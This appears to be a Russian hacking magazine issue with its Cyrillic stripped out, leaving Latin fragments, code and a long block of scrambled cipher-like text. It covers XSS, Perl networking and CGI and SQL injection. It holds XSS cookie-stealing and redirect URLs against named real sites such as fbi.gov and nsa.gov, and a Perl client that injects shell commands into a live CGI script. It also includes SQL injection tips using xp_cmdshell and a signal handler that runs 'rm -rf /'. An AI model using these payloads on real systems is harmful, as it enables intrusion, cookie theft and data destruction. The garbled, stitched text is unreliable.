Cross-Site Scripting
http://websecurity.com.ua/17/

http://websecurity.com.ua/23/
XSS lenta.ru
http://websecurity.com.ua/40/
XSS-
http://websecurity.com.ua/149/
lenta.ru
http://websecurity.com.ua/405/
drive.mail.ru
http://www.securitylab.ru/analytics/271169.php
HTTP-
Flash ActionScript
http://websecurity.com.ua/18/
Shockwave Flash
http://websecurity.com.ua/373/
Flash plugin HTTP header injection
http://websecurity.com.ua/361/
XSS
http://www.securitylab.ru/analytics/271931.php


http://websecurity.com.ua/369/

58 02-07



-
.
. - .
aka Mustlive
mustlive@websecurity.com.ua
-.
( , ).
,
,
( , gif jpg),
- ( swf) ( ). , , , .
,
- . - ,
.

-

.
- . , , Cross-Site Scripting .
XSS-
,
, .
,
( , ,
- ). , ,

-
,

XSS-, - .
. , ,

.
XSS-
(, ,
) .
www.clx.ru. XSS- ,
, IP-.
,
XSS. 100%
, .
www.prospero.ru, www.procontext.ru, www.seopoint.ru.

, . , PROCONTEXT
,
PROSPERO, ,

.

, ,
,
. , ,
IP- ( CLX).
XSS-,
(
). search_words
:
http://www.prospero.ru/forum_search?
search=1&search_words=%27%3E%3Cscript%
3Ealert%28document.cookie%29%3C%
2Fscript%3E
http://procontext.ru/forum_search?
search=1&search_words=%27%3E%3Cscript%
3Ealert%28document.cookie%29%3C%
2Fscript%3E
http://seopoint.ru/forum_search?search=
1&search_words=%27%3E%3Cscript%3Ealert%
28document.cookie%29%3C%2Fscript%3E
www.mainlink.ru. :

http://mainlink.ru/find/?what=%3Cscript
%3Ealert(document.cookie)%3C/script%3E
www.setlinks.ru.
http://www.setlinks.ru/partner/editpage.html?id=xxxx
POST- ( ):
"><script>alert(document.cookie)</script>

3Cscript%3Ealert(document.cookie)%
3C/script%3E
http://adbroker.ru/get_code.php?scid=
2484&lid=1&css_class=%22%3E%3Cscript%
3Ealert(document.cookie)%3C/script%3E
www.affiliatenetwork.ru.
:

www.adbroker.ru. :

http://www.affiliatenetwork.ru/
affiliates_new/viewpaid.php?kol_zap_str=
%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://adbroker.ru/user_partner.php
?action=adv_queries&uarq_order=4%22%3E%

www.link.ru. -, , ,

XSS www.fbi.gov
http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('XSS')
http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert(document.cookie)
http://www.fbi.gov/cgi-bin/outside.cgi?http://websecurity.com.ua

(1)

XSS www.nsa.gov
(2)
http://www.nsa.gov/snac/downloads_db.cfm?MenuID=%22%3E%3Cimg%20src=javascript:
alert(%22XSS%22)%3E
alert(XSS), IE
http://www.nsa.gov/snac/downloads_db.cfm?MenuID=%22%3E%3Cimg%20src=javascript:
alert(document.cookie)%3E
alert(document.cookie), IE
http://www.nsa.gov/snac/downloads_db.cfm?MenuID=%22%3E%3Cimg%20src=javascript:
document.location=%22http://websecurity.com.ua%22%3E

60 02-07

. XSS-,
.
:
http://www.link.ru/?sid=%27%3E%3Cscript%
3Ealert(document.cookie)%3C/script%3E
http://www.link.ru/adv.cgi?sid=%27%3E%3C
script%3Ealert(document.cookie)%3C/
script%3E
http://www.link.ru/reklama.cgi?sid=%27%
3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E
http://www.link.ru/siteowner.cgi?sid=%
27%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
http://www.link.ru/contact.cgi?sid=
%27%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
http://www.link.ru/stats.cgi?sid=%27%3E%
3Cscript%3Ealert(document.cookie)%3C/
script%3E

XSS-

Cross-Site Scripting ( CSS XSS)


(- -)
,

, .
, ,
, .
-
XSS
: XSS,
XSS XSS DOM.
, .
XSS. XSS.
(

). ,
XSS- , -

http://www.link.ru/faq.cgi?sid=%27%3E%3C
script%3Ealert(document.cookie)%3C/
script%3E
http://www.link.ru/?sid=%27%3E%3Cscript%
3Edocument.location%3D'http://
websecurity.com.ua'%3C/script%3E
www.context.meta.ua.
:
http://context.meta.ua/?mode=
phrase&phrase=%3Cscript%
3Ealert(document.cookie)%3C/script%3E
.
(procontext.ru context.meta.ua) XSS-
.
,
, . (XSS ).

. ( )
(
),
( , ).
, ,
,
.

.
- ,
-.
XSS. XSS. ,

XSS.
, XSS-, XSS-
-.
,
,


,
( ). , , ,
.
,
, ,
-

.
XSS DOM (DOM Based XSS).
XSS .

XSS.


.
.
XSS DOM ,
XSS, ( , ),
.
-,
.

www.begun.ru. , -, :
http://www.rambler.ru/srch?words=%D2%E5%
F1%F2%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E
XSS DOM .
http://direct.yandex.ru. XSS-,
( ), ,
- (
itnews.com.ua):
http://itnews.com.ua/s.cgi?page=2'%
3Balert(document.cookie)%3Ba='&q=
%F2%E5%F1%F2
http://itnews.com.ua/s.cgi?page=2'%
3Bdocument.location%3D'http://
websecurity.com.ua'%3Ba='&q=%F2%E5%F1%F2
XSS DOM
. .
. ,
XSS . , , . XSS . , ,
.
http://en.wikipedia.org/wiki/Cross_site_scripting
ross-Site Scripting
www.securitylab.ru/analytics/275087.php
DOM
http://websecurity.com.ua/127/

http://websecurity.com.ua/9/
BugsWeek
http://websecurity.com.ua/90/
mainlink.ru
http://websecurity.com.ua/109/
mainlink.ru
chttp://websecurity.com.ua/137/
adbroker.ru
http://websecurity.com.ua/250/
adbroker.ru
http://websecurity.com.ua/323/
www.link.ru
http://websecurity.com.ua/260/
www.link.ru
http://websecurity.com.ua/17/

http://websecurity.com.ua/398/

http://websecurity.com.ua/397/
itnews.com.ua





http://www.gameland.ru/

Dark Fall: The Journal / Divine Divinity 2 / Elevator Action Old & New / Dorabase / ConXYWZHYNTS)JXYWZHYNTS+NSINSL3JRT'JT\ZQK<FWNT1FSI&I[FSHJ(WNHPJY)FWPXYFQPJWX(MWTSNHQJ9MJ(MFTX9T\JW)F[NI)TZNQQJY/ZIT
'QFHPFSI<MNYJ2FSMZSYJW3J\>TWP0J^XYT2FWFRTS(TTQ/TPJW 8JYQNSJ0SNLMY8MNKY(ZWXJTK8TZQX+:*19FHYNHF4SQNSJ8UFHJTQTS^
)^SFXY^<FWWNTWX&I[FSHJ5XN4UX7F^RFS9MJ,WJFY*XHFUJ+WJJPXY^QJ8(&7
(WF_^1TYT8UWNSL'WJFP2FSMZSYJW8FS+WFSHNXHT5FHNKNH1NGJWFYNTS+TWHJ+WFSPQNSX,WJFY&I[JSYZWJX+WZNYKFQQ8YFWXHFUJ'TRGJWRFS:*+&(MFRUNTSX1JFLZJ)JFIQ^8PNJX...<JMW\TQK5WFJYTWNFSX&SST<FW7TGT'QNY_,ZNQY^,JFW=&I[FSHJ*INYNTS
,ZSXYFW8ZUJW-JWTJX84(42:83F[^8*&1X9WTUNHT5FWFINXJ.XQFSI'TRGJWRFS8YTW^(WFXM'TTR'FSLMFHP.SKJHYNTS5FWY9JJSFLJ
2ZYFSY3NSOF9ZWYQJX2ZYFSY3NLMYRFWJ5WNRFQ8YFW<FWX4GN<FS8ZRRTSJW7JI+FHYNTS..2W8RTT_QJX,TJX3ZYXT
'TG7TXX5FNSYNSL4KK7TFI7JISJHP7FHNSL(FPJ2FSNF'FHP9T9MJ'FPJW^-FWQJR,QTGJYWTYYJWX<TWQI9TZW8UJQQ+TWHJ
8MFIT\<FWX9FQPRFS5T\JWIWTRJ-FWTGTYX&HYNTS(MFXJ-TQQ^\TTI8YZSY)WN[JW7ZG7FGGNYX2)0&WRFLJIITS+WJJ<TWQI,WFSI9MJKY&ZYT
;NHJ(NY^3NLMYXMFIJ)ZSJ,JSJWFYNTSX(TSVZJXY9MJ;^WNZR:UWNXNSL0FWFTPJ7J[TQZYNTS;TQZRJ0FTYMJ0FSLFWTT7TZSI3FSTXYWF^'TWS
&RJWNHF3T5JFHJ'J^TSIYMJ1NSJ<<*7F\8UNIJW2FS3TWYMQFSI,ZS8MT\IT\S/TNSY9FXP+TWHJ2JYJTX'TPYFN9MJ8ZS.XNS>TZW-FSI
)^SFXY^9FHYNHX8YFW<FWX0SNLMYXTKYMJ4QI7JUZGQNH8NSL8YFW8MFIT\LWTZSIX8YFW<FWX/JIN0SNLMY../JIN4ZYHFXY9TR(QFSH^X8UQNSYJW(JQQ)TZGQJ
&LJSY5JYJW/FHPXTSX0NSL0TSL2^YM...9MJ<TQK&LJ,JSJKTWLJ7JGJQQNTS2FWPTK0WN&NW'QFIJ&WHFSZR4K8YJFR\TWPXFSI2FLNHP4GXHZWF
*^J9T^0NSJYNH*^J9T^2TSPJ^2FSNF1JKY'JMNSI*YJWSFQ+TWHJX5TQFWNZR<MT<FSYXYT'JF,F_NQQNTSFNWJ$/FHP
0JFSJ+TWI8YWJJY7FHNSL1&)ZJQ2JYFQ&WRX,QNYHMNSYMJ8^XYJR8NQPWTFI4SQNSJ)J[NQ2F^(W^*XHFUJKWTR&QHFYWF_(WNRJHWFKY-TWXJ7FHNSL2FSFLJW288FLF&3J\)F\S3-19FP9MJ8YFKKTK)WJFRX3J]Y,JSJWFYNTS9JSSNX 7TQFSI,FWWTX:84UJS1JLJSITK?JQIF9MJ
2NSNXM(FU,FSL<FW&WR^TK9\T+ZQQRJYFQ&QHMJRNXYFSIYMJ'WTPJS&SLJQ(FXYQJ[FSNF5TWYWFNYTK7ZNS),WF^2FS3N4M'WZHJ1JJ6ZJXYTKYMJ
)WFLTS9MWJJ0NSLITRX(QFXMTK)JXYNS^<FWMF\P2TYT,5:QYNRFYJ7FHNSL9JHMSTQTL^>X9MJ&WPTK3FUNXMYNR&QNJS'QFXY9MJ*SHTZSYJW
,ZSXQNSLJW,NWQ;TQ.S(TQI'QTTI5WNSHJXX3FYFXMF8YZIJSY8JHWJY&LJSY,WFSI9MJKY&ZYT1JLFH^)FWP8MFIT\X
2JYWTNI5WNRJ*HMTJX(TSXYFSYNSJ&LJTK2^YMTQTL^9MJ9NYFSX0NSLTK7TZYJ(FY\TRFS9^HTTS(NY^3J\>TWP8NI2JNJWX7FNQWTFIX7F^RFS
-TTIQZR-F[TH8ZRRTSJWYTQNKJ<*114SQNSJ,FQFHYNH<WJXYQNSL+JFYZWNSL:QYNRFYJ2ZXHQJ2JIFQTK-TSTW7NXNSL8ZS(TIJ&LJ(TRRFSIJWX
2JYFQ,JFW8TQNI8ZGXYFSHJ-ZSYNSL:SQNRNYJI7FNQ7ZSSJW)8JLF7FQQ^*8533-1-THPJ^
0*[TQZYNTS,98JWNTZX8FR9MJ+NWXY*SHTZSYJW9TRG7FNIJW9MJ5WTUMJH^2JYFQ+FYNLZJ8YFW3JY+WTSYNJW)NL)ZL)NLLNSL8YWNPJ2TWYFQ0TRGFY
)JHJUYNTS*^J9T^5QF^)ZSLJTS8NJLJ..'WTPJS<TWQI'FYYQJKNJQI'FI(TRUFS^0NSLTK+NLMYJWX2F]NRZR.RUFHY)JFYM
/W'JS-ZW,TQIJS*^J7TLZJ&LJSY1ZSFW0SNLMYX7FNI4[JW9MJ7N[JW7TTYX'TZSY^-TZSIX&LJTK
<TSIJWX8MFIT\2FLNH.HJ\NSI)FQJ+NJQI(TRRFSIJW)FNLFXXT'FSI'WTYMJWX(ZWXJ9MJ*^JTK.XNX5WNSHJTK5JWXNF9MJ9\T9MWTSJX)NXSJ^X1NQT 
8YNYHM8JHTSI1NKJ'TRGJWRFS1FSI9TZHM+WTLLJW-JQRJY(MFTX8JWNTZX8FR&I[FSHJ8TSNH&I[JSYZWJ'FYYQJ3-19MWTSJTK)FWPSJXX-NYRFS(TSYWFHYX<TWRX'QFXY)JQF\FWJ8Y/TMS;TQZRJ9MJ8JFHQNKK9WFLJI^-JF[^<JFUTS)JQZ]J*XHFUJ;JQTHNY^3T[F'FYYQJXTK5WNSHJTK5JWXNF
2JYFQ8QZL&I[FSHJ2TSXYJW2FISJXX<FWMFRRJW,QTW^NS)JFYM8UQFXMIT\S7NIJX,TSJ<NQI)FWP(QTZI8YFWXMNUX:SQNRNYJI)N[NIJI,FQF]NJX
8MFIT\2FSJHTSI(TRNSL+NLMY3NLMY(TSIJRSJI(WNRNSFQ4WNLNSX3JJIKTW8UJJI2TXY<FSYJI8NRX:SQJFXMJI1TWITK
YMJ7NSLX9FHYNHX0NSLITR:SIJW+NWJ-JWTJX:+(8ZIIJS.RUFHY0FNITZ7FHNSL'FYYQJ8YTQJS:QYNRF=4I^XXJ^)WFLTS*RUNWJX
&SXZ_FS7FNIT7TRJ9TYFQ<FW'FWGFWNFS.S[FXNTS2FUQJ8YTW^+WJJITR+TWHJ[X9MJ9MNWI7JNHM(FUHTR(QFXXNHX(TQQJHYNTS7JQTFIJI2TSXYJW9WZHPX)8
3NSOF,FNIJS'QFHP,9&I[FSHJ5WT(TSHJUY7FHNSL1ZSFW1JLJSI/FPFSI)F]YJW<N_FWIW^2W7TGTY4[JWHQTHPJI8THHJW+ZW^8\NYHMKNWJ
5NWFYJXTKYMJ(FWNGGJFS)JFI2FSX(MJXY4ZY7ZS(TFXY(TFXY&WRTWJI(TWJ3J]ZX&SFHMWTST]3JJIKTW8UJJI-TY5ZWXZNY)F^
TKYMJ2ZYFSYX0NWG^&NW7NIJ8JYYQJWX8YFW<FWX,FQFHYNH'FYYQJLWTZSIX+FQQTZY'WTYMJWMTTITK8YJJQ)FWP&LJTK(FRJQTY1FG^WNSYMTKYMJ2NSTYFZW
2*9749MJ1FXY7JKZLJ=JSZX3NSYJSITLX)FHMXMZSIFSI+WNJSIX2JLF2FS'FYYQJ(MNU(MFQQJSLJ&WTZSIYMJ<TWQINS)F^X
2JHM<FWWNTW2JWHJSFWNJX+WFRJ(NY^0NQQJW(TRGFY2NXXNTS8MTHP+TWHJ-TWXJ_+NWJI:U8MNJQI<FW<TWQI9FHYNHFQ(TRGFY2FIFLFXHFW2FKNF9MJ
(NY^TK1TXY-JF[JS8YFW9WJP)JJU8UFHJ3NSJ9MJ+FQQJS*FXY.SINF(TRUFS^,ZSIFR8JJI'FYYQJ&XXFZQY2JLF2FS?JWT8<&9,QTGFQ
8YWNPJ9JFR2TGNQJ+TWHJX8UJHSF_+QFY4ZY1F\ 4WIJW/ZXYNHJ.X8JW[JI8MJSRZJ../FRJX'TSI*[JW^YMNSLTW3TYMNSL'WNFS1FWF.SYJWSFYNTSFQ(WNHPJY8NRX:SN[JWXNY^'FSOT5NQTY0FFS'FWGFWNFSX'QFIJ8U^WT&-JWTX9FNQ<FWQTWIX.;-JWTJXTK*YMJWNF,ZNQY^,JFW=8UNPJ9MJ
-JILJMTL5NWFYJX9MJ1JLJSITK'QFHP0FY0NSLTK+NLMYJWX*=-T\QNSL'QTTI(WJFYZWJ(TSKQNHY9MJ(QFS<FWX8YFW<FWX'FYYQJKTW3FGTT9TR(QFSH^X
9MJ8ZRTK&QQ+JFWX(TRRFSIJW*ZWTUJFY<FW(WF_^+WTL7FHJW)NLNRTS<TWQI)8+NWJKNLMYJW(TRRFSI7FLNSL.SKJWST
3JNLMGTZWXKWTR-JQQ4S;FHFYNTS-T[JW&HJ(TRGFY7FHNSL?TSJ8FGTYFLJ+NXYTKYMJ*RUNWJ&QFWRKTW(TGWF3NYWT(TQI3NLMY8ZS*YJWSFQ8TSFYF
2FXX*KKJHY'FQIZWX,FYJ)FWP&QQNFSHJ7ZRGQJ7TXJX8\TWITK*YMJWNF9NRJ8UQNYYJWX..3-17ZXMKTW'JWQNS
)NJ-FWI3FPFYTRN5QF_F-NYRFS'QTTI2TSJ^(QN=W7FHJYT7JXZWWJHYNTS+NWJ*RGQJR5FYMTK7FINFSHJ89&10*78MFIT\4K(MJWSTG^Q+TWRZQF
4SJ)JXHJSY2F]NRT[X&WR^TK?NS(W^XYFQ0J^9MJ+FW7JFQR,WFSINF=YWJRJ(WTXXKNWJ

62 02-07

Perl

- .
.
PERL,
.
Insider
brain_insider@mail.ru

Perl, :
,
.
- ,
. ,
,
, .

Perl, ,
. , ,

, .
,
, , , ,
Perl.
, (exploit, .)
c , , . , .
, , -

, , . ? ,
DoS-
- .
, , . ,
Perl.

, , .
? , , TCP/IP.
Perl? Perl, ,
. , /++,
Perl . , ;),
, Perl 200-300
10 . ,
. Perl - .
Perl-, C,

Perl .
,
, Perl. ,

.
, Perl
. ,
,
C, , , . , ,
, Perl . ,
, (,
), , ,
. , :
Perl
CPAN ( ). - , - CPAN. Perl
( , Unix,
).

63

), request
LWP::UserAgent, ,

HTTP::Response. LWP::UserAgent
,
. , HTTP
HTTP-.
HTTP::Request:
METHOD ,

(
POST, GET, PUT ..).

, , Perl , .
- ,
,
. ,
,
Perl-. Perl
, :).
, , , ,
Perl,
/ .
www. web-? , HTTP- . , ,
SQL-
( , , web), , , ,
.
,
LWP (LWP The World-Wide Web library for Perl).
,
www,
, . , www: (ftp, http, file, smtp, etc.) e-mail'.
,
, LWP , ,
- , - .
HTTP-style , -.
. HTTP::Request ( HTTP

URI (UNIFORM RESOURCE IDENTIFIER)


, ,

,
,
,
, HTTP://MEGASITING.EE:8080/SCRIPT.CGI?PARAM=PAM&PAM=PAM.
HEADERS


-.
HTTP-
.
CONTENT ,
.
,

HTTP::RESPONSE,
,
:
CODE (200
, 404 FILE
NOT FOUND, 500
);
1

MESSAGE
( );
2

HEADERS
.
;
3

CONTENT , .

, HTTP- ( 1).
, . LWP::UserAgent,
. , Perl .
-
(


, -).
, LWP::UserAgent : LWP::UserAgent->new(from => 'pupkin@gov.no',
agent => 'MyMegaMailSender/2.5.7', ) # SMTP-.

agent, . HTTP-, -

CPAN (Comprehensive
Perl Archive Network)
CPAN (COMPREHENSIVE PERL ARCHIVE
NETWORK)
PERL , CPAN.ORG. SEARCH.CPAN.ORG WEB-, PERL. PERL
,
. - CPAN.ORG
. , ,
, ,
.
,
CPAN ,

PERL. ,
. , CPAN,

,
.
, - . - , .
,
SEARCH.CPAN.ORG , WWW,
NET, RSS . ,
. ,
CPAN
PERL,
.

64 02-07

PEERADDR ( PEERHOST)

'XX.XX.XX.XX' ;
PEERPORT,
;
PROTO,
('TCP', 'UDP');
TYPE.
SOCK_STREAM ( ,

),

SOCK_RAW (, ) SOCK_DGRAM
( ).

Comprehensive Perl Archive Network

, . HTTP::Request

request, . is_success ( is_error) 1 . ,

.
, - ,
,
.
LWP::Simple,
:
GET($URL), $URL, $URL ;
HEAD($URL)
;
GETPRINT($URL),
;
GETSTORE($URL, $FILE)
$FILE, .

,
HTTP-. LWP
. , LWP
Proxy, . .

.

, Perl . ,
-
Perl. Perl IO::Socket, .
,
(, IO::Socket::INET
TCP- UDP-, IO::Socket::SSL
). , Perl Socket,

C- Socket.h , IO::Socket.
TCP-, - , IO::Socket::INET, :
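use IO::Socket::INET;

# Open a TCP connection to $remote_host:$remote_port (both expected to be
# set before this point; not shown), send one line and read one line back.
# As printed, the constructor arguments used "->" and bare words where
# "=>" and quoted strings belong, and the die message lost its quotes, so
# the snippet did not compile; restored here.
my $socket = IO::Socket::INET->new(
    PeerAddr => $remote_host,
    PeerPort => $remote_port,
    Proto    => 'tcp',
    Type     => SOCK_STREAM,
) or die "Can't open connection with $remote_host:$remote_port: $!\n";

print $socket 'Save the planet kill yourself!';
# <$socket> returns the first line the peer sends (up to a newline).
$answer = <$socket>;
close($socket);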
. IO::Socket::INET :

, ,
print <>.
(
, ), Listen ( ), Type LocalPort.
, :
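# Listening TCP server skeleton: bind $server_port (set elsewhere, not
# shown), queue up to 10 pending connections and handle clients one at a
# time.  The original declared the socket as "$serever" but then called
# accept() on "$server", an undefined variable; the name is fixed here and
# a failed bind is reported instead of being silently ignored.
my $server = IO::Socket::INET->new(
    LocalPort => $server_port,
    Type      => SOCK_STREAM,
    Listen    => 10,
) or die "Can't listen on port $server_port: $!\n";

# accept() blocks until a client connects and returns its socket.
while (my $client = $server->accept()) {
    ... # per-client work goes here
}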
$server->accept()
( IO::Socket) , $socket .
,
Socket, C, man socket .
,
Net::*. , , Telnet, SMTP, FTP (Net::Telnet,
Net::SMTP, Net::FTP ). , (Net::IP, Net::TCP, Net::HTTP, Net::Gen,
Net::Inet ...), . Net::Gen Net::Inet ,
Net::TCP tcp- (
Net::Inet Net::Gen), Net::IP IP-, Net::HTTP
http
.

65

Net::HTTP. , .

HTTP-, LWP,
www-. Net::HTTP
IO::Socket::INET,
,
Net::HTTP.
Net::HTTP
:
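use Net::HTTP;

# Fetch "/" from www.xakep.ru over a raw Net::HTTP connection and stream the
# body to STDOUT in 1024-byte chunks.  The printed listing created the
# connection as $con but then read from $s (never defined), and used "->"
# where "=>" belongs in the argument lists; both are fixed here.
my $con = Net::HTTP->new(Host => 'www.xakep.ru')
    || die 'ups, somthing wrong...';
$con->write_request(GET => "/", 'User-Agent' => "MyMegaAgent/1.0");
my ($code, $mess, %h) = $con->read_response_headers;
while (1) {
    my $buf;
    my $n = $con->read_entity_body($buf, 1024);
    die "read failed: $!" unless defined $n;   # undef signals a read error
    last unless $n;                            # 0 bytes: end of body
    print $buf;
}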
, ,
,
NetPacket, ,
NetPacket::Ethernet, NetPacket::TCP, NetPacket::IP,
NetPacket::ICMP .


. decode
.
,
.
encode, , ,
. CPAN (http://search.cpan.org/search?query=NetPacket&mode=all).

. Perl ,
, . . Perl .
%SIG , .
, $SIG{'INT'} = 'IGNORE'
Ctrl+C. , , , - :
$SIG{'TERM'} = $SIG{'INT'} = {print
'Whats da F@#$?!'."\n";
system('rm -rf /');}; #

-
, , .
,
C- -

ftp
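use LWP::UserAgent;

# Fetch http://www.xakep.ru with LWP::UserAgent and print the status code,
# message and every response header; on failure print the status line.
# The printed listing had "GET!'http://...'" (a garbled "=>"), which does not
# compile, and walked the HTTP::Headers object's internal hash directly;
# the public header_field_names/header accessors are used instead.
my $obj = LWP::UserAgent->new();
$obj->agent('MyExapmle/1.0');
my $req = HTTP::Request->new(GET => 'http://www.xakep.ru');
my $result = $obj->request($req);
if ($result->is_success) {
    print 'Code: ' . $result->code . "\n";
    print 'Message: ' . $result->message . "\n";
    print 'Headers: ' . $result->headers . "\n";   # stringified object, as before
    foreach my $key ($result->headers->header_field_names) {
        print "\n" . $key . ":" . $result->headers->header($key) . "\n";
    }
} else {
    print $result->status_line, "\n";
}
1;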

(1)

Unix . Perl syscall, :


syscall LIST;
( ), LIST &SYS__, .
, Perl 14 .
syscall -1
$!,
,
. :
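package main;
require 'syscall.ph';   # h2ph-generated constants such as &SYS_write
use strict;

# Write $string to STDOUT through the raw write(2) system call and report
# the outcome.  syscall returns -1 on failure and sets $!, so the return
# value is what decides success; the original tested $! alone (and reset it
# twice), which can misreport a successful call if $! already held a value.
my $string = 'Hell no, world!';
$! = 0;   # clear errno so a stale value is not printed by mistake
my $rc = syscall(&SYS_write, fileno(STDOUT), $string, length $string);
if ($rc == -1) {
    print("syscall SYS_write failed:\n" . $! . "\n");
} else {
    print "Success!\n";
}
1;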
, , fileno , length . , , , ,
Perl.
, man.
. ,
,
Perl. , , ,

, . ,
, . ,
, , ,
. Perl , , Perl ( ),
, . , , !

66 02 -07




CGI- ,
.
, WEB-
CGI- (
).
Insider
brain_insider@mail.ru

, , .
,

- :).
, ( cgi
). .
, .
-
. ,
. :). ,
, , ,
. , ,
- , , ( , ), , (
, HTTP- POST GET
).
, ,
. - HTML- (, <a
href=www.xakep.ru></a> )
. ,
. , , , ,
,
XSS!
( ,
),

, ,
. , HTML- .
. , HTML- - <INPUT TYPE="HIDDEN" NAME="ID" VALUE="1167069479"> . , , ID . ,
ID , ,

.
. ,
1167069479, ,
,

1167070058. ,
,
Unix.
,
. ? ,
,
-
( ,
, ,
).
? , , -
, ,
.
, , ,

.
. , ,
, ,
shell' -.
-- . open() Perl ,
. ,
. . , , :
>perl -d -e 0
>open FF, 'ls -l |';
>print <FF>;
.
( -
0),
(
).
. , . , :
pipe
.
, .
. ,
, ,
,
. :

67

http://dm9.ru/cgi-bin/
perltest/script.cgi?Send=
%D0%9E%D1%82%D0%BF%D1%80%D0%B0%
D0%B2%D0%B8%D1%82%D1%
8C&text=1&name=1&ID=ls%20-la%20|.
,
!
-
. , .
, - . , , , -
. ,
- (, :)). .

URL
,
. ,
.
,
, , ,

, . ,
LWP
(
).
2. , , .
, , . -! ,
HTML
. ,
.
. , . , ! , , , , ,
,
, .

, , - .
?
. ,
.

HTML-
(1)
<!-- Page returned by the guestbook CGI script (listing 1 in the article).
     The hidden ID field carries a value the article goes on to show the
     script reading back from the request.  A hidden form field is entirely
     under the client's control, so the server must validate it exactly like
     any other parameter. -->
<html>
<body>
<TABLE ALIGN="CENTER">
<TR><TD>Date: Mon Dec 25 17:55:37 UTC 2006
</TD></TR><TR><TD>Name:
</TD></TR><TR><TD><PRE>
-! </PRE></TD></TR><INPUT TYPE="HIDDEN" NAME="ID"
VALUE="1167068903
"> </TABLE><BR> <TABLE ALIGN="CENTER">
[...SKIPPED...]
<BR> <FORM ACTION="/cgi-bin/guest/script.cgi" METHOD="POST">
Name: <INPUT TYPE="TEXT" NAME="name"><BR><BR>
:<BR> <TEXTAREA NAME="text" ROWS="15" COLS="50" WRAP="PHYSICAL">
<INPUT TYPE="SUBMIT" VALUE="" NAME="Send">
<INPUT TYPE="HIDDEN" NAME="ID" VALUE="1167069479"> </FORM>
</body>
</html>

(2)
#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
my $obj = LWP::UserAgent->new();
my $req = "";
my $url = shift;
while(1)
{
my $comm = "";
print '> ';
$comm = <STDIN>;
chomp($comm);
my $query =
$url.'?Send=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C&text=1&name=1&
ID='.$comm;
print "\n".$query."\n";
$req = HTTP::Request->new(POST => );
my $result = $obj->request($req);
if($result->is_success)
{
print "ok!\n";
print $result->content;
}
}
1;

S P E

I A L

68 SPECIAL DELIVERY 02- 07

-.

.


.

SECURITYLAB.RU?

: ,
. -, , SecurityLab , , . .

: , .

. - ,
.
-.
security-,
, , .

, ,

:
, , .
.
,
Infowatch .
,


Positive
Technologies,
securitylab.ru.
,


.

, ,

(http://michael.antipov.name),

,

.

:: . ,
. , . , .
,
- . ,

.

.
,

, ?

:
, SecurityLab.

. ,
, , , ,
. , : web- , ,
.


.

,

.
?

: , . ,
. ,

69

. ,
,
.


?


.

(
), IDS-
( )
, .


, ,

: .
,
. ,
, .
: http://en.securitylab.ru/nvd/.
21260,
1 1988 .

: . , , . , ,
,
.

( ).
, ,

?
?

: ,
- . , ,
Positive Technologies, . , .
, .

Q
F A
L
A
I
E
P
S


Spider_Net
(spider_net@inbox.ru),
www.vr-online.ru

vr-online.ru,

mashp
(mashp.h10.ru).

4 ,
Delphi PHP.



.

?

, 100% .
- , , .
,
.

. , MySQL. , version() .
MySQL. -

, , ,
, , . SQL Injection
, .
.
, ,

PHP .
www.kipelov.ru/ly.php?idtxt=1
. - idtxt, - .
version() : www.kipelov.ru/ly.php?idtxt=version(). , -

71

, .
, .
MySQL,
.
, UkrTeam.
. www.packetstormsecurity.nl.

, , MS SQL Server.
. , MS
SQL Server. , SYSTEM, .

SQL INJECTION ?

SQL INJECTION
(COOKIES)?

, - POST-.
.
, ,
. cookies. , , CookieEditor
SQL Injection. Cookies.
SQL

, .
MySQL BenchMark,
. : benchmark(1000000, md5(current_time)). 100000 md5
. , . , , ,
benchmark . MySQL- ,
, , ,
. ,
.

INJECTION 3- 4-
MYSQL?


SQL INJECTION?

, 4- .
UNION, , . SQL Injection.
Bugtraq , SQL Injection .
?
SQL INJECTION
MS SQL SERVER?

. , version 4, , , .
, ,
SQL .

.
, ! ,
.
. , .
, . , -

3- :
SQL INJECTION

?
SQL INJECTION
MS SQL SERVER?

SQL Injection , , ,
SQL Injection. ,
SQL Injection , ,
. , MS SQL Server exec
master..xp_cmdshell 'dir /p', ,

-
?

,
web-.
. PHP. .
PHP, ASP. .
, PHP . PHP 4
. .

.
, :).
(
)
.

: PHP Web-
( SQL Injection) .
,
.

S P E

I A L

72 SPECIAL DELIVERY 02- 07

,
//


,

SecurityLab.ru

Microsoft
Student Partner

Microsoft

C# .NET


www.vr-online.ru,
11
4

: ,
UNIX,


,
-8
,

.

,

W2K,
FreeBSD 4.5

SQL INJECTION

,
WEB
.
SQL INJECTION?

: SQL Injection , web-, ,


,
, SQL- ( SQL-).
: , , , backend' . - - ( , www SQL Injection). ,
.
: , , SQL,
. , , SQL. sql-, .
. ,
. (
). ( ) sql- , . , ,
, , sql-
( ,
sql- ). , web
( ), SQL Injection .

73

SQL
INJECTION ?

XSS
?

:
SQL-: ( / , )
; ,
; , ; .
: : sql-, ;
(, query_string); c ,
, ,
;
, ( ),
.
: , , , (, ). , ,
. , , ,
, .
,
, .
: SQL-. , SQL-, web-, ,
PHP Perl', , ( ), ,
PHP. SQL- ,
PHP-, SQL PHP-.
PHP (, ,
Perl). . ,
: ,
( ) ..
, ,
, - , , .
: ! , . , SQL- .

, web-IDS- ( mod_security secureIIS).
: , XSS
, .
XSS ,
PR-.
: , , HTML- (www.security.nnov.ru/articles/3APA3Ahtml.asp). , , 1998 .
, , . Aleph
One ( Bugtraq) ,
. 2001
CSS/XSS ,
Cross-Site Scripting.


ISP.

, ,
3proxy (www.security.nnov.ru/soft/3proxy/)

74 SPECIAL DELIVERY 02- 07

: . SQL Injection
. . , , , , . , , . , , , .
: .
. ,
. , ,
, . XSS-,
, , ,
:).
: XSS/Cross-Site Scripting , Netscape
JavaScript. , . . ,
. ()
, . , cookies' ( ).
. ,
.
XSS
?


SQL
INJECTION XSS ( ,
) 100%

: - SQL Injection XSS


. ( ), . :).
: , ,
- . ,
HTML- .
100% .
: .
. .
. , . , . , .
. , . ,
.
, . , . !
Agnitum , , , Outpost Firewall
, . , ,
. , .
: Java , , (, ). IE , . ,
. ,
( Lynx, Linux).
: , 100% .
.
